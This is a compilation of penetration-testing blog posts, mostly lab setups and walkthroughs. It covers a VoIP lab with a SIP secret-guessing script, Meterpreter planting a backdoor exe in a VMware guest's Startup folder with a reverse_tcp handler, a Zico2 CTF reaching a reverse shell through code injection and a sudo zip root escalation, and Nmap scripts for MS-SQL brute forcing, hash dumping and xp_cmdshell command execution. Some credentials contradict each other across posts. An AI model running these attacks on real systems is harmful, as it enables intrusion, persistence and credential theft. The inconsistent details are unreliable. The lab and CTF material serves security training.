
Lab Setup for VOIP Penetration Testing


Hello friends! Today you will learn how to set up a VoIP server in a virtual machine from the Trixbox 2.8.0.4 ISO image, so that softphones on the local network can make calls and send text messages to each other. The result is a lab target for VoIP penetration testing.

From Wikipedia

Voice over Internet Protocol (also voice over IP, VoIP or IP telephony) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.

Let’s start!!

Open VMware Workstation, select "Create a New Virtual Machine" and, when the wizard asks where to install from, choose the third option:

I will install the operating system later

Then click Next.

Now select "Linux" as the guest operating system and "Ubuntu" as the version (Trixbox is CentOS-based, but this choice only sets VMware defaults). Click Next through the remaining pages as required.

Click "Customize Hardware" and make the following changes:

Under CD/DVD, browse to the Trixbox 2.8.0.4 ISO file.

Under Network Adapter, select "Bridged" and enable "Replicate physical network connection state", so the PBX gets an address on the same LAN as the softphones.

Then click Finish.

Trixbox is a popular Asterisk-based distribution. It lets even a novice user quickly set up a VoIP phone system together with supporting applications such as MySQL. Trixbox can be configured to handle a single phone line for a home user, several lines for a small office, or several T1s for a million-minute-a-month call centre.

The VM boots from the ISO automatically. For the Trixbox CE installation follow the steps below:

A dialog box asks for the keyboard type; choose "US" as shown in the image below and click OK.

Another dialog box asks for the time zone; select Asia/Kolkata (or your own) and click OK.

Now enter the password you want for the root user; I used tribox. Type it again to confirm and click OK.

The installation now runs automatically and takes some time, as shown in the image below. Do not interrupt it until it reaches 100 %.

Once the installation completes it asks for a login. Type username: root and password: tribox

Check the network interface with the "ifconfig" command; here it shows my VM's IP: 192.168.1.218.

Now open http://192.168.1.218 in a web browser. Through the Trixbox GUI we are going to create user accounts by assigning each one an extension number, much like the number your provider assigns to a landline.

By default the Trixbox GUI opens in user mode; to create extensions we need to switch to admin mode.

Click the "switch" link in the top right corner.

Admin mode requires authentication.

Enter username: maint and password: password. These are the Trixbox defaults (and therefore the first thing anyone tries against a PBX), so change them on anything that is not a throwaway lab.

You will get a pop-up about Trixbox registration; close it.

The Trixbox dashboard shows the server status. Click PBX and select PBX Settings from the menu.

Under the Setup tab on the left, select Extensions under Basic.

Select device

Now follow the steps below to create an extension on the server:

Device: Generic SIP Device

Click Submit

Add extension

User Extension: 1234567 (any number; 7 or 8 digits here so that the extensions look like real phone numbers)

Display Name: ignite (the name of the user or customer this number belongs to)

Device Options

secret: 123 (this is the SIP password the phone registers with; a three-digit secret is fine for a lab and is exactly what makes extensions brute-forceable in the wild)

dtmfmode: rfc2833

Once you have entered the information for the new extension, click Submit.

Similarly create one more extension so that we can test communication between the two.

From the image you can see we have now configured two extensions: ignite [1234567] and raj [12345678].

One extension will act as caller and the other as receiver. You can create as many extensions as you need.

Now click the orange "Apply Configuration Changes" bar to put the changes into effect.

A pop-up opens; select "Continue with reload".

That is all for the server installation and the configuration of extensions on it.

Now download the Zoiper application on your system.

Zoiper is a VoIP softphone that lets you send messages and make voice and video calls.

Once it is installed it looks like the image below. Open the settings to configure an account that can make and receive calls.

Select account type SIP and click Next.

Remember that in the Trixbox GUI we added extension 1234567 for ignite; enter that information in the account wizard.

Enter the user number together with the server IP, as below:

1234567@192.168.1.218

Enter the secret of this extension (123) as the password.

Click Next.

Zoiper auto-detects the account name, as shown in the image. Click Next.

The account now appears in the account list, and ignite is able to make and receive calls.

We have created the ignite account in Zoiper on the PC. Now we install Zoiper on another device for the second user, who will call or be called by ignite.

Download Zoiper from the Google Play Store on your Android phone and run it after installation.

Tap the config icon, as shown in the image, and select Accounts from the list of settings.

In the new window tap Add account. A dialog box for account setup appears; tap YES.

Another dialog box pops up; select manual configuration for the account setup.

Choose SIP as the account type.

Now enter the following SIP account settings:

Account name: raj

Host: 192.168.1.218

Username: 12345678

Password: 123

Now tap Save.

You can see from the image that the account for raj is ready.

We now have two Zoiper accounts: raj on the phone will be the caller, and ignite on the PC will be the receiver of the incoming call.

As both extensions are configured, we test the VoIP setup by placing a call from raj.

Raj calls ignite by dialling 1234567; when you do this you hear the ringback tone on the phone.

Ignite receives the incoming call on the PC as shown in the image. Click Answer to accept the call from raj.

From the screenshot you can see that the call is connected and raj and ignite are talking over VoIP.

Great!!! In this way you can configure a VoIP server for the local network and let multiple users call or chat with each other. Both the SIP signalling and the RTP audio in this lab go over plain UDP with no TLS or SRTP, which is what makes it a useful target.
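What Zoiper does when it registers extension 1234567 with secret 123 is a SIP digest exchange, and that exchange is the first thing worth probing on a VoIP lab, because the secret itself never leaves the phone; only an MD5 digest over it does. The following Python script is an added example written for this article, not part of Trixbox, Zoiper or the original post: it builds the REGISTER request, answers the 401 challenge the way a softphone does, and shows how a sniffed Authorization header can be checked offline against a list of candidate secrets. The PBX address, extension and secret are the ones from the write-up; the local address 192.168.1.50, the Call-ID and branch values, and the sample 401 response are assumptions constructed for the demo.

```python
"""SIP digest registration against the lab PBX (added example, not part of the original post)."""
import hashlib
import re
import socket
from typing import Iterable, Optional

PBX = "192.168.1.218"                  # Trixbox IP from the write-up
EXTENSION, SECRET = "1234567", "123"   # extension "ignite" and its secret, as configured above
LOCAL = "192.168.1.50"                 # assumed address of the softphone running this script

_PARAM = re.compile(r'(\w+)=("[^"]*"|[^,\s]+)')   # key=value / key="value" pairs in auth headers


def _md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def status_code(msg: str) -> int:
    """Status code of a SIP response ('SIP/2.0 401 Unauthorized' -> 401)."""
    return int(msg.split("\r\n", 1)[0].split(" ", 2)[1])


def _auth_params(header_value: str) -> dict:
    return {k.lower(): v.strip('"') for k, v in _PARAM.findall(header_value)}


def parse_challenge(msg: str) -> dict:
    """Realm, nonce and algorithm from the WWW-Authenticate header of a 401."""
    m = re.search(r"^WWW-Authenticate:\s*Digest\s+(.*)$", msg, re.I | re.M)
    if not m:
        raise ValueError("no Digest challenge in response")
    return _auth_params(m.group(1))


def digest_response(user: str, realm: str, password: str, method: str, uri: str, nonce: str) -> str:
    """RFC 2617 digest without qop, the form Asterisk-based PBXs such as Trixbox accept."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def build_register(ext: str, host: str, cseq: int = 1, challenge: Optional[dict] = None,
                   password: Optional[str] = None, call_id: str = "lab-call-1",
                   branch: str = "z9hG4bKlab1", tag: str = "lab") -> str:
    """REGISTER request; with a challenge and password it carries the Authorization header."""
    uri = f"sip:{host}"
    lines = [
        f"REGISTER {uri} SIP/2.0",
        f"Via: SIP/2.0/UDP {LOCAL}:5060;branch={branch};rport",
        f"From: <sip:{ext}@{host}>;tag={tag}",
        f"To: <sip:{ext}@{host}>",
        f"Call-ID: {call_id}@{LOCAL}",
        f"CSeq: {cseq} REGISTER",
        f"Contact: <sip:{ext}@{LOCAL}:5060>",
        "Max-Forwards: 70",
        "Expires: 60",
    ]
    if challenge is not None:
        resp = digest_response(ext, challenge["realm"], password, "REGISTER", uri, challenge["nonce"])
        lines.append(f'Authorization: Digest username="{ext}", realm="{challenge["realm"]}", '
                     f'nonce="{challenge["nonce"]}", uri="{uri}", response="{resp}", algorithm=MD5')
    lines.append("Content-Length: 0")
    return "\r\n".join(lines) + "\r\n\r\n"


def guess_secret(auth_header: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline check of a sniffed 'Authorization: Digest ...' line: the digest is MD5 over
    (secret, nonce, uri), so whoever captured the REGISTER can try secrets as fast as MD5 runs."""
    p = _auth_params(auth_header.split(":", 1)[1])
    for pw in candidates:
        if digest_response(p["username"], p["realm"], pw, "REGISTER", p["uri"], p["nonce"]) == p["response"]:
            return pw
    return None


def register(host: str, ext: str, secret: str, timeout: float = 3.0) -> int:
    """Live two-step registration over UDP/5060; returns the final status (200 ok, 403 bad secret)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_register(ext, host).encode(), (host, 5060))
        reply = s.recv(4096).decode(errors="replace")
        if status_code(reply) != 401:
            return status_code(reply)
        ch = parse_challenge(reply)
        s.sendto(build_register(ext, host, cseq=2, challenge=ch, password=secret).encode(), (host, 5060))
        return status_code(s.recv(4096).decode(errors="replace"))


# Constructed 401 in the shape Asterisk sends; the nonce is made up for the demo.
SAMPLE_401 = ("SIP/2.0 401 Unauthorized\r\n"
              f"Via: SIP/2.0/UDP {LOCAL}:5060;branch=z9hG4bKlab1;received={LOCAL}\r\n"
              'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="4b1a2c3d"\r\n'
              "Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    ch = parse_challenge(SAMPLE_401)
    msg = build_register(EXTENSION, PBX, cseq=2, challenge=ch, password=SECRET)
    auth = next(l for l in msg.splitlines() if l.startswith("Authorization:"))
    print(msg)
    print("recovered secret:", guess_secret(auth, ["1234", "admin", "123"]))
    # print(register(PBX, EXTENSION, SECRET))   # run this one against the live Trixbox VM
```

The `register()` call is the only part that touches the network; everything else runs offline. The point of `guess_secret()` is the caveat for the lab above: anyone who can sniff the LAN (or the bridged interface) sees one REGISTER and can recover a secret like 123 instantly, so real deployments need long random secrets and SIP over TLS.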

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Lab Setup for VOIP Penetration Testing appeared first on Hacking Articles.


Post Exploitation in VMware Files with Meterpreter


Hello friends!! Today you will learn how to compromise an operating system that runs inside a virtual machine on a host you have already exploited.

Requirement

Attacker: Kali Linux

Target: Windows 10 host running VMware Workstation, with a Windows Server 2012 VM image on disk

First the attacker needs to exploit the host operating system of the victim PC and obtain a meterpreter session with administrative privileges.

From the given image you can see I have a Windows 10 meterpreter session with admin privileges.

meterpreter > sysinfo

When you create a virtual machine in VMware Workstation, its hardware and network settings are stored on the host in a .vmx file, next to the .vmdk files that hold the guest's virtual disks.

Type the following to search the host for .vmx files:

meterpreter > search -f *.vmx -r

From the given image you can see it lists every location where a .vmx file is stored.

A .vmx file is a plain text document of key = "value" lines, so you can read it with the cat command.

We open the .vmx of the Windows Server 2012 VM image:

meterpreter > cat "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"

From the image below you can read the network and hardware settings of this VM. The entries that matter for the next step are the ones ending in .fileName, which name the .vmdk disk files.
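The .vmx is the map to everything else on the host: which .vmdk holds the guest's disk (the path the mount step needs), which network the guest sits on, and whether a shared folder bridges host and guest. The parser below is an added example, not tooling from the post or from VMware: it reads the key = "value" format and resolves disk names relative to the .vmx, which is how VMware stores them. The sample .vmx text is constructed for the demo, modelled on the Windows Server 2012 VM from the write-up; the key names are VMware's own.

```python
"""Pull disk paths and network settings out of a VMware .vmx file (added example)."""
import re
from typing import Dict, List

_LINE = re.compile(r'^\s*([\w.:-]+)\s*=\s*"(.*)"\s*$')     # key = "value"
_DEVICE = re.compile(r'^(scsi|ide|sata|nvme)\d+:\d+\.fileName$', re.I)
_ABS = re.compile(r'^([A-Za-z]:[\\/]|[\\/]|\\\\)')         # C:\..., /..., \\server\...


def parse_vmx(text: str) -> Dict[str, str]:
    """Return the key/value pairs; blank lines and anything that is not key = "value" are skipped."""
    entries = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            entries[m.group(1)] = m.group(2)
    return entries


def resolve(vmx_path: str, name: str) -> str:
    """VMware stores disk names relative to the directory holding the .vmx unless they are absolute."""
    if _ABS.match(name):
        return name
    cut = max(vmx_path.rfind("/"), vmx_path.rfind("\\"))
    return vmx_path[:cut + 1] + name


def vmdk_candidates(text: str, vmx_path: str) -> List[str]:
    """Full paths of the .vmdk files attached to this VM: what VDK_PATH of vmdk_mount wants.
    ISO images on the CD-ROM device are filtered out by extension."""
    cfg = parse_vmx(text)
    return [resolve(vmx_path, v) for k, v in cfg.items()
            if _DEVICE.match(k) and v.lower().endswith(".vmdk")]


def summarize(text: str) -> dict:
    """Name, guest type, memory, NICs (device, connection type, MAC) and shared folders."""
    cfg = parse_vmx(text)
    nics = []
    for k, v in cfg.items():
        m = re.match(r'^(ethernet\d+)\.connectionType$', k)
        if m:
            nic = m.group(1)
            nics.append((nic, v, cfg.get(f"{nic}.generatedAddress", cfg.get(f"{nic}.address", "?"))))
    shares = [v for k, v in cfg.items() if re.match(r'^sharedFolder\d+\.hostPath$', k)]
    return {"name": cfg.get("displayName"), "guest": cfg.get("guestOS"),
            "memory_mb": int(cfg.get("memsize", "0")), "nics": nics, "shared_folders": shares}


# Constructed .vmx in the shape VMware Workstation writes; not taken from the write-up's host.
SAMPLE_VMX_PATH = "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
SAMPLE_VMX = r'''.encoding = "windows-1252"
config.version = "8"
virtualHW.version = "12"
displayName = "windows Server 2012"
guestOS = "windows8srv-64"
memsize = "2048"
scsi0.present = "TRUE"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "windows Server 2012.vmdk"
ide1:0.present = "TRUE"
ide1:0.deviceType = "cdrom-image"
ide1:0.fileName = "D:\iso\win2012.iso"
ethernet0.present = "TRUE"
ethernet0.connectionType = "bridged"
ethernet0.generatedAddress = "00:0c:29:aa:bb:cc"
sharedFolder0.hostPath = "C:\Users\pentest\Documents"
'''

if __name__ == "__main__":
    print(summarize(SAMPLE_VMX))
    for p in vmdk_candidates(SAMPLE_VMX, SAMPLE_VMX_PATH):
        print("VDK_PATH candidate:", p)
```

Run it over the output of the meterpreter `cat` (or `download` the .vmx first) to get the exact string to put into VDK_PATH; the shared-folder entry is worth noting too, since a guest that is later compromised can reach that host directory directly.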

The vmdk_mount post module mounts a VMDK (Virtual Machine Disk) file on a drive letter chosen by the user, taking advantage of VMware's vstor2 device driver. It first runs the binary vixDiskMountServer.exe to access the device and then sends control codes via DeviceIoControl to mount the disk. Use write mode with extreme care: only open a disk file writable if you know for sure that no snapshots or clones are linked to it, and only while the VM is powered off. DEL_LCK removes the .lck lock directory VMware leaves next to the disk, so the mount still succeeds when the VM was not shut down cleanly.

use post/windows/manage/vmdk_mount

msf post(vmdk_mount) > set DEL_LCK true

msf post(vmdk_mount) > set READ_MODE false

msf post(vmdk_mount) > set session 2

msf post(vmdk_mount) > set VDK_PATH "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmdk"

msf post(vmdk_mount) > run

VDK_PATH takes the .vmdk disk file, not the .vmx; the disk file's name is the scsi0:0.fileName (or ide0:0.fileName) entry of the .vmx we read above, and it normally sits in the same directory.

Great!! We have successfully mounted the VMDK of the Windows Server 2012 image.

meterpreter > show_mount

From the image below you can read the information for each drive; the VM's disk now appears as drive L:.

Now with the command below I upload an exe backdoor into the Startup folder on the L: drive; it will give us a reverse connection from Windows Server 2012 the next time that VM boots and a user logs in inside VMware Workstation.

meterpreter > upload /root/Desktop/abc.exe "L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"

Then start a handler for the payload the backdoor was built with:

use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.113

msf exploit(handler) > set lport 445

msf exploit(handler) > run

Awesome!! We have successfully exploited the Windows Server 2012 virtual machine and gained a meterpreter session from it. Note that this only works if the VM's network adapter can reach 192.168.1.113 (bridged or NAT), and that because the file was planted while the VM was off, no antivirus inside the guest saw it being written; it may still be scanned when it runs.

meterpreter >sysinfo

Source: http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Post Exploitation in VMware Files with Meterpreter appeared first on Hacking Articles.

MS-SQL Penetration Testing lab Setup


Hello friends!! Today you will learn how to install and configure Microsoft SQL Server on Windows 10 so that it can serve as a target for MS-SQL penetration testing.

Requirement:

  1. Download the setup file ENU\x64\SQLEXPR_x64_ENU.exe (SQL Server 2012 Express)
  2. Download the setup file ENU\x86\SQLManagementStudio_x86_ENU.exe from here
  3. Download the HeidiSQL tool

Configure SQL express setup

Open the first downloaded file, running it as administrator. Click Installation and choose "New SQL Server stand-alone installation".

To install SQL Server 2012 the setup goes through the following three steps:

  • License terms
  • Product updates
  • Install setup files

Enable the check box "I accept the license terms" and click Next.

Enable the check box "Include SQL Server product updates" to pick up security and performance fixes. It found a 26 MB update online, which is installed when you click Next.

Setup now installs its support files, which takes some time. As soon as that finishes you get the Feature Selection screen for your SQL Server.

Feature Selection

Select the features you want to install; in the image you can see I enabled the check boxes for the following:

  • Database Engine Services
  • SQL Server Replication
  • SQL Client Connectivity SDK

Click Next.

Instance Configuration

Specify the name and instance ID of the SQL Server instance. The directory structure, registry structure and service names all incorporate the instance name and a specific instance ID, and the instance ID becomes part of the installation path.

  • Enter SQLExpress in the text field for Named Instance
  • Enter SQLExpress in the text field for Instance ID

Then click Next.

You can select Default Instance instead if no instance of SQL Server was installed previously; a default instance does not require the client to give an instance name when connecting.

Database Engine Configuration

Specify the authentication mode of the Database Engine.

By default sa is the administrator login of MS SQL.

Under the authentication mode panel:

  • Click Mixed Mode, which enables both Windows authentication and SQL Server authentication (logins with a username and password, such as sa).
  • Type and confirm the password for the sa account.

From the image you can see that the selected Windows user is added to the SQL Server administrators, who have unrestricted access to the Database Engine. Mixed mode with a guessable sa password is exactly what password brute-forcing against port 1433 relies on; on a production server you would keep Windows authentication only, or at least give sa a long password and disable or rename it.

Then click Next, and Next again.

Your SQL Server 2012 installation completed successfully; here you can check the status of the installed features.

Now open SQL Server Configuration Manager, which has a left and a right panel.

In the left panel click "Protocols for SQLEXPRESS", then in the right panel select the protocol "TCP/IP".

Under the IP Addresses tab, in the IPAll section, set TCP Port to 1433 (and clear TCP Dynamic Ports), click Apply and then enable TCP/IP. Restart the SQL Server service for the change to take effect. Without this step the Express edition listens only on a dynamic port, or only on shared memory, and is not reachable from the network.

Configure SQL Management Studio setup

Now open the second downloaded application, the SQL Server Management Studio setup, and add a new feature.

There are no updates for SQL Server 2012; click Next.

Installation type

Since we have already created the instance "SQLExpress", we can add features to the SQLExpress instance of SQL Server 2012.

From the image below you can see the table of installed instances. Click Next.

Feature selection

Enable the check box "Management Tools - Basic" under Shared Features, then click Next and Next.

The Management Tools - Basic installation completed successfully; here you can check the status of the installed features.

Now log into SQL Server with the admin (sa) credentials and click Connect.

Once logged in, expand the Security folder and create a new login for another user.

Enter the username (I used "ignite"), choose SQL Server authentication for this login and set a password.

From the image you can see that master is the default database.

Connect to server

Run HeidiSQL to connect to the MS SQL Server as the ignite user with the following settings:

Network type: Microsoft SQL Server (TCP/IP)

Hostname / IP: 192.168.1.104

User: ignite

Password: 123456

Port: 1433

HeidiSQL is a useful and reliable tool for developers working with MySQL, Microsoft SQL Server and PostgreSQL databases. It lets you browse and edit data and create and edit tables, views, procedures, triggers and scheduled events.

Now click Open.

Great!! We have successfully accessed the MSSQL database server over the network. From here you can create or modify tables and databases, and much more. Connecting as ignite rather than sa is also a quick way to see what a low-privileged login can reach on your lab server.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post MS-SQL Penetration Testing lab Setup appeared first on Hacking Articles.

Hack the Zico2 VM (CTF Challenge)


Hello friends! Today we are going to take another CTF challenge known as Zico2. The credit for making this VM goes to "Rafael" and it is another boot2root challenge, where we have to root the system to complete it. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here it is 192.168.0.26, but you will have to find your own).

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.0.26

We find port 80 open, so we open the IP in the browser.

Browsing through the site we find that it is vulnerable to LFI: a page parameter that includes local files.

We couldn't find anything else of interest, so we use dirb to find directories.

dirb http://192.168.0.26/

We find an interesting directory called dbadmin and open it in the browser.

This page contains another link, which leads to a phpLiteAdmin login page.

We tried the password "admin", and it granted us access.

This version of phpLiteAdmin is vulnerable to PHP code injection: it writes databases to disk under whatever file name you give them.

So we create another database and name it shell.php; we then use this database to inject PHP code.

After injecting our code we use the LFI to include shell.php, which executes it. Here you can see that the ls command was executed when we triggered our shell.

Now we create an executable payload with msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.25 lport=4444 -f elf > /root/Desktop/shell

We move it to /var/www/html/ so the target can fetch it from our web server, and set up our listener (multi/handler) in Metasploit.

We then use the PHP code injection to download our file onto the server, make it executable and run it.

We execute the PHP code through the LFI and get a reverse shell.

Searching through the files we find the password for user zico in /home/zico/wordpress/wp-config.php

We use this password to log in through SSH.

Looking around further, we check sudoers (sudo -l) and find that we are allowed to run a few commands as root.

Now we move to the /tmp folder, where we find a few files we uploaded earlier. We use zip to gain root privileges by executing a shell command through zip's unzip-command option:

sudo -u root zip shell.zip shell.py -T --unzip-command="sh -c /bin/bash"

After gaining root privileges we move to the root folder. Inside it we find a file called flag.txt, and when we open it we are greeted by a message congratulating us on completing the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Zico2 VM (CTF Challenge) appeared first on Hacking Articles.

MSSQL Penetration Testing using Nmap


Hello friends! Today we are going to perform Microsoft SQL penetration testing using Nmap scripts to retrieve basic information such as database names, usernames and table names from a SQL Server running on Windows. In our previous article we set up Microsoft SQL Server on Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let's start!!

Scan port 1433

Open a terminal in Kali Linux and scan the target IP for port 1433 with nmap.

nmap -p 1433 192.168.1.104

From the image below you can see that port 1433 is open for the MS-SQL service.

Enumerating version information

The command below attempts to determine configuration and version information for Microsoft SQL Server instances. It needs no credentials: the version comes from the TDS pre-login handshake, and where UDP 1434 is open the SQL Server Browser service adds instance names and ports.

nmap -p 1433 --script ms-sql-info 192.168.1.104

In the image below you can see the installed version and details of the MS-SQL server.
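What ms-sql-info reads without a password is the server's answer to a TDS PRELOGIN packet. The script below is an added example, not Nmap's script or any project's code: it builds the PRELOGIN the way a client does, parses the server's reply into a version number and encryption setting, and maps the major version to the product year. The constructed reply (11.0.2100 with encryption not supported) is a sample made for the demo; the field layout follows MS-TDS, with the VERSION option read as major, minor, build and sub-build, which is how Nmap's tds library interprets it.

```python
"""Minimal TDS PRELOGIN exchange: unauthenticated SQL Server fingerprinting (added example)."""
import socket
import struct

TDS_PRELOGIN = 0x12   # packet type the client sends
TDS_RESPONSE = 0x04   # "tabular result" packet type the server answers with
OPT_VERSION, OPT_ENCRYPTION, OPT_INSTOPT, OPT_THREADID, OPT_MARS = 0, 1, 2, 3, 4
ENC_NAMES = {0: "ENCRYPT_OFF", 1: "ENCRYPT_ON", 2: "ENCRYPT_NOT_SUP", 3: "ENCRYPT_REQ"}
PRODUCT = {9: "2005", 10: "2008/2008 R2", 11: "2012", 12: "2014", 13: "2016",
           14: "2017", 15: "2019", 16: "2022"}


def tds_packet(ptype: int, options) -> bytes:
    """Wrap PRELOGIN option tokens in a TDS packet. options: list of (token, payload)."""
    table, data = b"", b""
    offset = len(options) * 5 + 1          # token table (5 bytes each) + 0xFF terminator
    for token, payload in options:
        table += struct.pack(">BHH", token, offset, len(payload))
        data += payload
        offset += len(payload)
    body = table + b"\xff" + data
    # header: type, status (0x01 = end of message), length, SPID, packet id, window
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(body), 0, 1, 0) + body


def build_prelogin(encryption: int = 2) -> bytes:
    """Client PRELOGIN: zero version, no encryption support, default instance, MARS off."""
    return tds_packet(TDS_PRELOGIN, [
        (OPT_VERSION, struct.pack(">BBHH", 0, 0, 0, 0)),
        (OPT_ENCRYPTION, bytes([encryption])),
        (OPT_INSTOPT, b"\x00"),
        (OPT_THREADID, struct.pack("<I", 0)),
        (OPT_MARS, b"\x00"),
    ])


def parse_prelogin_response(packet: bytes) -> dict:
    """Version and encryption setting from the server's PRELOGIN reply."""
    ptype, status, length = struct.unpack(">BBH", packet[:4])
    if ptype != TDS_RESPONSE:
        raise ValueError(f"unexpected TDS packet type 0x{ptype:02x}")
    body = packet[8:length]
    opts, i = {}, 0
    while body[i] != 0xFF:
        token, off, ln = struct.unpack(">BHH", body[i:i + 5])
        opts[token] = body[off:off + ln]
        i += 5
    major, minor, build, subbuild = struct.unpack(">BBHH", opts[OPT_VERSION])
    enc = opts[OPT_ENCRYPTION][0]
    return {"version": f"{major}.{minor}.{build}",
            "product": f"SQL Server {PRODUCT.get(major, 'unknown')}",
            "encryption": ENC_NAMES.get(enc, f"0x{enc:02x}")}


def probe(host: str, port: int = 1433, timeout: float = 5.0) -> dict:
    """Live version: one TCP round trip, no login attempt, nothing in the SQL audit log."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_prelogin())
        return parse_prelogin_response(s.recv(4096))


# Constructed server reply (not a real capture): SQL Server 2012 Express, 11.0.2100, no encryption.
SAMPLE_RESPONSE = tds_packet(TDS_RESPONSE, [
    (OPT_VERSION, struct.pack(">BBHH", 11, 0, 2100, 0)),
    (OPT_ENCRYPTION, b"\x02"),
    (OPT_INSTOPT, b"\x00"),
    (OPT_THREADID, b""),
    (OPT_MARS, b"\x00"),
])

if __name__ == "__main__":
    print(parse_prelogin_response(SAMPLE_RESPONSE))
    # print(probe("192.168.1.104"))   # against the lab server from the previous article
```

Two things the output tells a tester before any password is tried: the exact build, to compare against the patch level, and whether the server forces encryption; ENCRYPT_NOT_SUP or ENCRYPT_OFF means the login packet that follows would carry the password with only TDS's trivial obfuscation, which is why the brute-force step below is also visible to anyone sniffing the wire.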

Brute force attack

The command below attempts to find valid usernames and passwords for MS-SQL by brute force, using a username dictionary and a password dictionary.

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104

In the image you can see that we successfully retrieved credentials for two users:

  • Username: ignite and password: 12345
  • Username: sa and password: 123

Note that SQL Server records every failed login (error 18456) in its ERRORLOG by default, and a login created with CHECK_POLICY enforced can lock out under the Windows lockout policy, so a run like this is noisy and can disable the very account you are after.

Execute an MS-SQL query

Once you have the login credentials, pass them to the Nmap script to execute an MS-SQL query. The command below runs the query "sp_databases" against the Microsoft SQL Server.

sp_databases is one of the system stored procedures; it returns the list of database names on an instance of SQL Server.

nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases" 192.168.1.104

As a result it dumped two database names, "ignite" and "master", where master is the default database of MS SQL Server.

Check the Microsoft SQL Server configuration

The following command attempts to describe the Microsoft SQL Server configuration (databases, linked servers and options such as xp_cmdshell), passing the login credentials as script arguments.

nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

You can check the configuration settings in the image below.

Obtain list of tables

The following command attempts to fetch the list of tables from the Microsoft SQL Server, passing the login credentials as script arguments.

nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

You can check the list of tables in the image below.

Enumerate NetBIOS information

The Nmap script below enumerates information from remote Microsoft SQL services with NTLM authentication enabled, and needs no credentials.

Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials causes the remote service to respond with an NTLMSSP CHALLENGE message that discloses information including the NetBIOS name, DNS name and OS build version.

nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104

From the image below you can read the NetBIOS information of the remote Microsoft SQL server.

Dump password hashes

The following command dumps the password hashes of the SQL logins in a format suitable for cracking with tools such as John the Ripper. The login used needs the appropriate privileges (sysadmin, or CONTROL SERVER) to read the hashes from sys.sql_logins.

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From the image you can see that it dumped the password hashes of the logins, including the user sa that we enumerated above.

Identify database access

The following command queries Microsoft SQL Server instances for the list of databases a user has access to. This requires a valid login, so we pass the username and password as script arguments.

nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

In the image you can see that it shows user sa as the owner of the database "ignite".

MS-SQL xp_cmdshell option

xp_cmdshell is an extended stored procedure of Microsoft SQL Server that lets sysadmins execute operating system commands. By default the xp_cmdshell option is disabled, and because it is an advanced option, "show advanced options" must be turned on before sp_configure will accept it.

From the image below you can see we enabled xp_cmdshell by executing the following statements in the master database:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Each RECONFIGURE applies the preceding sp_configure change.

Exploit the xp_cmdshell function

The following Nmap script attempts to run a command through the command shell of Microsoft SQL Server if xp_cmdshell is enabled on the target. The default command is ipconfig /all; a different one is passed with the ms-sql-xp-cmdshell.cmd script argument.

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.104

From the image you can confirm that we executed the OS command net user and retrieved the user accounts. Anything run this way executes as the SQL Server service account on the Windows host, which is why xp_cmdshell stays disabled on any server that is not a lab.

Blank password leads to unauthorized access

If the administrator of Microsoft SQL Server leaves a login's password blank, an attacker can log straight into the database server. In the image below you can see we are exploring the properties of the "sa" account.

Here we set a blank password for the user "sa". As we know, sa is the administrator of MS SQL Server by default, so with a blank password the chance of an attacker gaining unauthorized access to the server goes up considerably.

Make unauthorized access into SQL Server

The following Nmap script tries to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p 1433 --script ms-sql-empty-password 192.168.1.104

From the image below you can see we logged in successfully as user sa with an empty password.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post MSSQL Penetration Testing using Nmap appeared first on Hacking Articles.

4 Ways to Capture NTLM Hashes in Network


Hello friends! Today we describe how to capture NTLM hashes on a local network. In this article we capture the same user's NetNTLMv2 hash four times, each time through a different method. Before we move on to the attack techniques, here is a brief introduction to NTLM.

The acronym NTLM is made up of the following terms:

NT: New Technology (Windows)

LAN: Local Area Network

M: Manager

